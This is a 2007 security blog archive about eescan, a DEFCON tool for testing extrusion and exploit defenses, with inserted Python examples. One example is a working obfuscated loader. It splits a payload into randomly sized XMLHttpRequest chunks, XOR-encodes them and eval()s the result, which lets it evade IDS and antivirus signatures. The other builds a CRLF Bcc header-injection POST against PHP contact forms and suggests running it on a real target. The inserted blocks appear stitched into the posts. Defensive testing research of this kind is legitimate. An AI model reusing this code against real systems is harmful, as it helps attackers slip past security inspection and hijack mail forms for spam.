Thursday, July 26, 2007

New Twists for HTML Obfuscation in EEscan

Update 8/7/2007 - Please see www.eescan.net for additional details.

I've just finished coding up some new HTML obfuscation modules for eescan. The exploitability tests in eescan will use these obfuscators to probe for

Here are some of the obfuscators that work right now:
  • gzip
  • deflate
  • chunked
  • MPack XOR javascript encoder
  • MPack cryptor 4-pass javascript encoder
  • AJAX
  • SSL
  • HTTP over port 443
  • SSL over port 80
  • arbitrary combinations like AJAX->Mpack->gzip->chunked->SSL->port 80
My favorite so far is the AJAX module, which breaks the target HTML into a random number of arbitrarily sized chunks, fetches each one with a synchronous XMLHttpRequest, reassembles them in order and then eval()'s the result. No single HTTP response carries the whole payload, so an inspector that looks at each object on its own never sees the signature it is matching on.

Initial testing of the AJAX modules is yielding great results against network-based IDS/IPS, so-so results against proxies and good results against desktop AV/IPS suites.
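To make the chunked delivery concrete, here is a small Python model of the server side of the AJAX module plus an emulation of what the loader does in the browser. This is an added example, not eescan's code (eescan is Python, hence the language): the chunk URLs /c/n, the sample target HTML and the single-byte XOR layer are assumptions for the demo, and the XOR step stands in for the MPack encoder rather than reproducing it.

```python
"""Chunked ("AJAX") delivery round trip, modelled on the module described above.

Added example, not eescan's code. Assumed: the stage is served as text chunks
at made-up URLs /c/<n>, the client loader is a synchronous XMLHttpRequest
loop, and the XOR layer is a stand-in for the MPack encoder, not MPack's code.
"""
import json
import random

# Constructed sample target: the HTML the exploitability test wants the browser to render.
TARGET_HTML = '<html><body><script>document.title="eescan-probe";</script></body></html>'


def stage_from_html(html):
    """The JavaScript the browser eventually eval()s: it writes the target HTML into the page."""
    return "document.write(%s);" % json.dumps(html)


def xor_encode(data, key):
    """Single-byte XOR over the stage (stand-in for the MPack XOR encoder)."""
    return bytes(b ^ key for b in data)


def split_at(data, cuts):
    """Split a string at the given offsets; the pieces concatenate back to the original."""
    bounds = [0, *sorted(cuts), len(data)]
    return [data[a:b] for a, b in zip(bounds, bounds[1:])]


def split_random(data, rng, min_chunks=3, max_chunks=8):
    """A random number of chunks with random boundaries, so no two deliveries look alike."""
    n = min(rng.randint(min_chunks, max_chunks), len(data))
    return split_at(data, rng.sample(range(1, len(data)), n - 1))


def build_loader(names, xor_key):
    """The page the client gets first: fetch every chunk synchronously, join, decode, eval."""
    js = ["var u=%s,s='';" % json.dumps(names),
          "for(var i=0;i<u.length;i++){var x=new XMLHttpRequest();"
          "x.open('GET',u[i],false);x.send(null);s+=x.responseText;}"]
    if xor_key is not None:
        js.append("var d='';for(var j=0;j<s.length;j+=2)"
                  "{d+=String.fromCharCode(parseInt(s.substr(j,2),16)^%d);}s=d;" % xor_key)
    js.append("eval(s);")
    return "<script>(function(){%s})();</script>" % "".join(js)


def obfuscate(html, rng, xor_key=None):
    """Server side: returns {chunk_url: chunk_text} in fetch order plus the loader page."""
    stage = stage_from_html(html)
    if xor_key is not None:
        # hex keeps every chunk plain text, so XHR responseText delivers it intact
        stage = xor_encode(stage.encode(), xor_key).hex()
    chunks = split_random(stage, rng)
    served = {"/c/%d" % i: c for i, c in enumerate(chunks)}
    return served, build_loader(list(served), xor_key)


def client_reassemble(served, xor_key=None):
    """Emulates the loader: fetch chunks in order, join them, undo the XOR layer."""
    s = "".join(served[name] for name in served)
    if xor_key is not None:
        s = xor_encode(bytes.fromhex(s), xor_key).decode()
    return s


def signature_seen(served, signature):
    """What a per-response inspector sees: does any single chunk contain the signature?"""
    return any(signature in chunk for chunk in served.values())


def demo(seed=7, xor_key=0x5A):
    """One deterministic delivery of the sample target (seeded so runs are repeatable)."""
    return obfuscate(TARGET_HTML, random.Random(seed), xor_key)


if __name__ == "__main__":
    served, loader = demo()
    print(loader)
    for name, chunk in served.items():
        print(name, repr(chunk))
    print("signature visible in any one chunk?", signature_seen(served, "document.write"))
    assert client_reassemble(served, 0x5A) == stage_from_html(TARGET_HTML)
```

Running it prints the loader page and the chunk table; the reassembled stage is byte-for-byte the original, yet no chunk contains the string an inspector would look for. A proxy that rebuilds the page object by object still only sees fragments unless it correlates the whole XHR sequence, which matches the so-so results against proxies noted above.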


Wednesday, July 11, 2007

Almost ready for eescan

Update - For more information see http://www.eescan.net

All of the upgrades went smoothly and now I've got the colo ready for some eescan action. I was able to add some dedicated IP addresses to my machine and some precious disk space.

You might be asking what this whole eescan thing is all about. Well I guess you'll just have to come to the talk at DEFCON to find out. Here's the abstract:

With this presentation we will demonstrate a new tool called eescan that automates extrusion and exploitability scanning using a client/server approach. Eescan will be released under the GPL and uses Python to create an extensible framework for testing extrusion and exploit defenses.

All network security systems have gaps. Layered security tries to cover the gaps with overlapping protections like firewalls, intrusion prevention, proxies and other mechanisms. How do you really know where the gaps are before the weeds grow through? Vulnerability assessment tools scan for vulnerable systems from an attacker's perspective. This technique has value but fails to represent the risk posed by client application usage and attacks. It also fails to assess extrusions: the traffic content allowed to leave a network.

Extrusion and exploitability scanning attempts to find these gaps using an automated scanning framework. The scanning techniques simulate user and attacker behavior from the client perspective to holistically measure the amount of risk in a given security system.

Tuesday, July 10, 2007

Downtime for eescan on 7/10/07

During the day today I'll be taking down mullingsecurity.com for some upgrades to prepare for eescan. The upgrade will consist of an OS upgrade, a bigger disk and some additional IP addresses.

The extra IP addresses are needed so that I have clean IPs available for eescan to use for egress and extrusion scanning. The extra disk space won't hurt either.

Monday, July 09, 2007

Did Google send you?

I find it fascinating how people arrive at a lowly blog with very little traffic. The short answer is that most visitors arrive via search terms.

Some of the search terms are predictable based on past blog entries. By far the most popular search engine queries leading to www.mullingsecurity.com are variations of the following:
  • q=ddabx.dll (interesting since the malware is 2+ years old)
  • q=php+mail+injection (a classic still in use by spammers and yes they come here for tips)
  • q=omfg.class (a really old java exploit)
And then there are the really interesting queries that lead here:
  • http://search.live.com/result.aspx?q=adult
  • http://search.live.com/result.aspx?q=mercedes
  • http://search.live.com/results.aspx?q=DOOR+BADGE+SECURITY
  • http://search.msn.com/results.aspx?q=door+security+posts
  • http://www.google.com.au/search?q=what+ports+do+i+need+to+open+on+firewall+for+stunnel
  • http://www.google.com/search?q=+Matt+Richard+security
  • http://www.google.com/search?q=gmail+body+location+bar
  • http://www.google.com/search?q=%2B%22card+cvv2%22+%2Bphishing
  • http://www.google.com/search?q=howto+remote+exploit+127.0.0.1
  • http://www.google.com/search?q=squid+botnet+domain
I conclude the following:
  1. MSN Live search really sucks.
  2. There are people exploiting localhost remotely.
  3. Having random security words on the same page gets you hits from Google.

PHP Mail Injection Testing Script

Here is a sample Perl script to test for PHP mail injection. The code has some documentation and might be usable if you already know how to hack foreign Perl scripts. :)

Most people try to test using GET requests, which will fail every time, since the browser and web server don't process the needed CR and LF characters correctly. The script makes a POST request to the server using three command-line arguments. It won't work as is, since you will need to modify it for the target script's form parameters.

I think I wrote this in February 2006 while helping a friend secure his contact form against php mail injection bugs.

Enjoy! http://www.opensecnet.com/php_inject_sample.pl.txt
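For readers who would rather see the mechanics than port the Perl, here is an added Python example (not the linked script) that builds the same kind of POST, models the vulnerable PHP contact form it targets, and shows the check that fixes it. The form field names, the target URL and the sample addresses are assumptions for the demo and must be adjusted to the real form; nothing is sent over the network.

```python
"""PHP mail() header injection: the request the tester sends, and a model of the
vulnerable contact form it targets.

Added example in Python, not the Perl script linked above. Assumed (must match
the target form): field names name/email/subject/message, and a form that drops
the email field straight into mail() headers.
"""
import re
from email.parser import HeaderParser
from urllib.parse import urlencode
from urllib.request import Request

# Constructed sample values; nothing here is sent anywhere.
TARGET_URL = "http://www.example.com/contact.php"
LEGIT = "tester@example.com"
INJECTED_BCC = "victim1@example.net, victim2@example.net"


def injected_email(legit, bcc):
    """The payload: a valid address followed by CR LF and a forged Bcc: header."""
    return "%s\r\nBcc: %s" % (legit, bcc)


def build_post(url, fields):
    """Send it as a POST body; urlencode keeps CR LF as %0D%0A so the server sees them."""
    body = urlencode(fields).encode()
    return Request(url, data=body,
                   headers={"Content-Type": "application/x-www-form-urlencoded"})


def vulnerable_headers(fields):
    """Model of the flaw: PHP along the lines of
         $headers = "From: $email\\r\\nReply-To: $email\\r\\n";
         mail($to, $subject, $message, $headers);
    Every CR LF inside $email starts a new header line."""
    return "From: %s\r\nReply-To: %s\r\n" % (fields["email"], fields["email"])


def parse_headers(raw):
    """Read the header block back the way the MTA will: name -> [values]."""
    msg = HeaderParser().parsestr(raw)
    return {name: msg.get_all(name) for name in msg.keys()}


LINE_BREAK = re.compile(r"[\r\n]|%0[aAdD]")


def safe_header_value(value):
    """The fix for the form: refuse any field carrying a raw or still-encoded line break."""
    return LINE_BREAK.search(value) is None


def probe_fields(bcc=INJECTED_BCC):
    """Form fields as the script's three command-line arguments would populate them."""
    return {"name": "eescan", "email": injected_email(LEGIT, bcc),
            "subject": "contact form test", "message": "header injection probe"}


if __name__ == "__main__":
    fields = probe_fields()
    req = build_post(TARGET_URL, fields)
    print(req.data)
    parsed = parse_headers(vulnerable_headers(fields))
    print("Bcc injected:", parsed.get("Bcc"))
    print("hardened form accepts the value:", safe_header_value(fields["email"]))
```

The printed POST body shows the email field arriving as `%0D%0ABcc%3A...`, and the parsed header block shows a Bcc: line for every place the form reuses the field, which is exactly what a spammer relies on. Against a real target, replace the modelled `vulnerable_headers` with a real send of `req` and watch a mailbox you control for the Bcc copy.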

Extrusion and Exploitability Scanning accepted for DEFCON 15

I'll be presenting my latest research on extrusion and exploitability scanning at DEFCON 15 this year. You can find presentation info and bio at http://www.defcon.org/html/defcon-15/dc-15-speakers.html#Richard.

The presentation is at 12:00pm on Sunday - check the DEFCON official site for more info.